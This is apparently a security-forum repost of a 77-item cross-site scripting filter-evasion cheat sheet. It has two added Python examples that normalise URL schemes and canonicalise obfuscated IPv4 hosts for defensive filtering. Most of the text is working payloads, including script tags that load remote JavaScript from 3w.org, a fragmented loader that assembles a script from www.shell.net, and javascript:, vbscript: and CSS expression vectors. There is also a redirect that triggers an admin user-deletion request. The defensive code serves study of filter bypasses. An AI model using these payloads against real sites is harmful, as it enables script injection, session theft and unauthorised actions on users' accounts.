There seem to be few XSS resources on t00ls; I saw something good and copied it over, in case anyone wants to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to split the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab to split the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null bytes are basically ineffective here in China, since there is nowhere to make use of them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
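Items (3) to (19) and (40) are all the same `javascript:`/`vbscript:` source spelled in ways a naive prefix check does not recognise but a browser does. The following is an added, defender-side example (not code from the original post or the cheat sheet it copies): it applies the same pre-processing a browser does to an attribute value before reading the scheme (HTML entity decoding, removal of leading/trailing control characters and spaces, removal of tab/newline/CR anywhere), then checks the resulting scheme against an allow-list. `ALLOWED_SCHEMES`, the hypothetical `naive_is_safe_link` check and the `SAMPLE_VECTORS` list are assumptions constructed for this example; the tab, newline, carriage return and null byte in the samples are the characters the forum rendering lost.

```python
"""Allow-list check for the scheme of a user-supplied URL.

Added example, not code from the original post. It undoes the same
pre-processing a browser applies to an attribute value before it reads the
scheme, so the case, entity, tab/newline/CR, null-byte and leading-space
variants of 'javascript:' listed above all collapse to the same string.
"""
import html
import re
from typing import Optional

# Schemes a user-supplied link or image source may use (assumption for this example).
ALLOWED_SCHEMES = {"http", "https"}

# Characters browsers remove from anywhere inside a URL before parsing it.
_INNER_STRIP = re.compile(r"[\t\n\r]")
# Leading/trailing C0 control characters and space are removed as well.
_EDGE_STRIP = "".join(chr(c) for c in range(0x21))
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def normalize_url(raw: str) -> str:
    """Return the URL as the scheme parser sees it after HTML entity decoding."""
    url = html.unescape(raw)            # &#106;avascript: -> javascript: (with or without ';')
    url = url.strip(_EDGE_STRIP)        # "  javascript:" -> "javascript:"
    return _INNER_STRIP.sub("", url)    # "jav\tascript:" -> "javascript:"


def url_scheme(raw: str) -> Optional[str]:
    """Lower-cased scheme of the normalised URL, or None for a relative URL."""
    m = _SCHEME.match(normalize_url(raw))
    return m.group(1).lower() if m else None


def is_safe_link(raw: str) -> bool:
    """True only for relative URLs or URLs whose canonical scheme is on the allow-list."""
    if "\x00" in html.unescape(raw):
        return False                    # a null byte is never legitimate in a URL attribute
    scheme = url_scheme(raw)
    return scheme is None or scheme in ALLOWED_SCHEMES


def naive_is_safe_link(raw: str) -> bool:
    """Hypothetical prefix check of the kind the vectors above were written to get around."""
    return not raw.lower().startswith("javascript:")


# Constructed samples modelled on items (3)-(19) and (40) above; the tab, newline,
# carriage return and null byte are the characters the forum rendering dropped.
SAMPLE_VECTORS = [
    "javascript:alert('XSS')",                    # (3)
    "JaVaScRiPt:alert('XSS')",                    # (4)
    "&#106;&#97;&#118;&#97;script:alert('XSS')",  # (5) entities with semicolons
    "&#106avascript:alert('XSS')",                # (8)/(9) entity without semicolon
    "jav\tascript:alert('XSS')",                  # (11)/(12) embedded tab
    "jav\nascript:alert('XSS')",                  # (13) embedded newline
    "jav\rascript:alert('XSS')",                  # (14) embedded carriage return
    "java\x00script:alert('XSS')",                # (17) null byte
    "  javascript:alert('XSS')",                  # (19) leading spaces
    "vbscript:msgbox('XSS')",                     # (40)
]


def slipped_past_naive_check(vectors=SAMPLE_VECTORS):
    """Vectors the prefix check accepts but the normalising allow-list rejects."""
    return [v for v in vectors if naive_is_safe_link(v) and not is_safe_link(v)]


if __name__ == "__main__":
    for v in slipped_past_naive_check():
        print(repr(v), "->", repr(normalize_url(v)))
```

Of the ten constructed samples only the two that literally begin with `javascript:` are caught by the prefix check; the other eight pass it and are rejected only after normalisation. The allow-list direction matters: a deny-list of scheme names would still miss `vbscript:` or any other scheme it did not name.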
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra opening brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escape filter
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE approach
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash movie that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js">
</SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP as decimal
<A HREF="http://3232235521">XSS</A>
(71) IP as hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
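Items (68) to (76) are the same host written as a decimal number, hex labels, octal labels, a mixture, a scheme-relative URL and a name with a trailing dot. A link filter that compares the raw string against a list sees six different hosts where the browser sees one. The following is an added, defender-side example (not code from the original post): it reduces every numeric spelling to a dotted quad using the WHATWG URL IPv4 parsing rules (up to four labels; `0x` is hex, a leading `0` is octal; the last label fills the remaining bytes) and strips the trailing dot, so that a list comparison is done on what the browser will actually connect to. `host_in` and the host lists in the usage are assumptions constructed for this example.

```python
"""Canonicalising the host of a link before comparing it with a list.

Added example, not code from the original post. Every numeric IPv4 spelling
a browser accepts is reduced to one dotted quad, following the WHATWG URL
IPv4 parser, and hostnames lose their trailing dot, so that a filter compares
the host the browser will connect to rather than the bytes the author typed.
"""
from typing import List, Optional
from urllib.parse import urlsplit


def _ipv4_label(label: str) -> Optional[int]:
    """Parse one dot-separated label: '0x..' is hex, a leading '0' means octal, else decimal."""
    if label == "":
        return None
    if label[:2].lower() == "0x":
        digits, base = label[2:], 16
        if digits == "":
            return 0                    # '0x' on its own is zero
    elif len(label) > 1 and label[0] == "0":
        digits, base = label[1:], 8
    else:
        digits, base = label, 10
    try:
        return int(digits, base)
    except ValueError:
        return None                     # not a number in this base: it is a hostname label


def canonical_ipv4(host: str) -> Optional[str]:
    """Return 'a.b.c.d' if host is any numeric IPv4 spelling, otherwise None.

    Up to four labels are accepted; the last label fills all remaining bytes,
    which is why a single 32-bit number such as 3232235521 is valid.
    """
    labels = host.rstrip(".").split(".")
    if not 1 <= len(labels) <= 4:
        return None
    values = [_ipv4_label(lab) for lab in labels]
    if any(v is None for v in values):
        return None
    *head, last = values
    if any(v > 255 for v in head) or last >= 256 ** (5 - len(values)):
        return None
    n = last
    for i, v in enumerate(head):
        n += v << (8 * (3 - i))
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> Optional[str]:
    """Lower-cased host without trailing dot; numeric hosts become a dotted quad."""
    host = urlsplit(url).hostname       # handles scheme-relative '//host/' too
    if not host:
        return None
    return canonical_ipv4(host) or host.rstrip(".")


def host_in(url: str, hosts: List[str]) -> bool:
    """Compare the canonical host of url against hosts canonicalised the same way."""
    host = canonical_host(url)
    if host is None:
        return False
    listed = {canonical_ipv4(h.lower()) or h.lower().rstrip(".") for h in hosts}
    return host in listed


if __name__ == "__main__":
    # Constructed inputs taken from the spellings in items (68)-(76) above.
    for link in ("http://3232235521", "http://0xc0.0xa8.0x00.0x01",
                 "http://0300.0250.0000.0001", "http://66.000146.0x7.147/",
                 "//www.google.com/", "http://www.google.com./"):
        print(link, "->", canonical_host(link))
```

The three spellings in items (70) to (72) all canonicalise to `192.168.0.1`, and the mixed form in (73) to `66.102.7.147`. Note what canonicalisation does not do: `google.com` and `www.google.com` in item (75) remain different hosts, because equating them is a DNS question, not a URL-parsing one.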

Original source: http://fuzzexp.org/u/0day/?p=14